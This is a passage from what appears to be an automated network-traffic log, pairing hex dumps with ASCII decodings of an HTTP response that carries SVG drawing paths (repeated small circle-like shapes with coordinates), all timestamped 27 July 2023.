                                                                                                                                                                                                                                                  Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC278INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC294INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC310INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC326INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC342INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC358INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC374INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC390INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                  Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC406INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC422INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC438INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC454INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC470INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC486INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                  Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC502INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC518INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                  Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC534INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
